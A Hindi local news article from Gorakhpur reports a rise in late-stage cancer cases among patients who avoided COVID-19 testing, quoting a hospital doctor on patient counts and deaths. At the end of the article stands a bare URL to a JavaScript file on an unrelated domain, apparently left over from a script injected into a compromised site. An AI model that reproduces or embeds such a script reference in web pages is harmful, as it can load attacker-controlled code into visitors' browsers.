गोरखपुर, ( कुलसूम फात्मा )   दिन पर दिन कोरोना संक्रमितों की संख्या बढ़ने के साथ-साथ अब गोरखपुर में कैंसर के भी मरीजों की संख्या बढ़ती हुई नजर आ रही है। ऐसे मरीज जो कोविड-19 की जांच से भागे हैं वह अब कैंसर की गंभीर जैसी बीमारी को लेकर हॉस्पिटल पहुंच रहे हैं। और यह संख्या निरंतर बढ़ती मिल रही है।

 

गोरखपुर में कैंसर से जूझ रहे मरीजों की संख्या कुछ दिन पहले 40 से 50% पाई गई थी, परंतु वर्तमान समय में ऐसे मरीजों की संख्या 70% हो गई है। इस बात की सूचना हनुमान प्रसाद पोद्दार कैंसर हॉस्पिटल के डॉक्टर अनुराग सिंह से पता चली। उन्होंने कहा की महामारी ने कैंसर मरीजों की संख्या को बढ़ा दिया है और जो मरीज जांच से भागे हैं, उन्हीं मरीजों में यह पाया जा रहा है। और अब ऐसे मरीज हॉस्पिटल कैंसर की बीमारी लेकर के पहुंच रहे हैं।

 

 

उन्होंने कहा ऐसे मरीज ज्यादातर तीसरे या चौथी स्टेज पर आ रहे हैं। अगर यह सही वक्त पर अस्पताल आ गए होते तो इनका फर्स्ट स्टेज में ही इलाज कर दिया जाता जिससे इनकी बीमारी पर कंट्रोल किया जा सकता था। काफी मरीजों के डायलिसिस में भी देरी हो गई है।  डॉ अनुराग ने बताया की वर्तमान समय में तकरीबन 200 से 250 मरीज ओपीडी में जाच के लिए आ रहे हैं। महामारी से पूर्व इनकी संख्या 400 से 500 के मध्य रहती थी। ऐसे में जो मरीज वक्त पर इलाज के लिए नहीं आ पा रहे हैं, उनके लिए बहुत खतरनाक बीमारी है।

 

 

कोरोना संक्रमण के कारण वर्तमान समय में 20 से अधिक कैंसर मरीजों की मृत्यु हो चुकी है। वहीं दूसरी ओर डॉक्टर कैंसर के मरीजों को संक्रमण से बचाव की भी एडवाइस दे रहे हैं। डॉक्टर का यह कहना है की कैंसर मरीजों को यदि संक्रमण हो जाता है तो वह बेहद खतरनाक है और बचना मुश्किल ही नहीं नामुमकिन है क्योंकि लास्ट स्टेज में अब संक्रमित व्यक्ति हॉस्पिटल आ रहे हैं।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.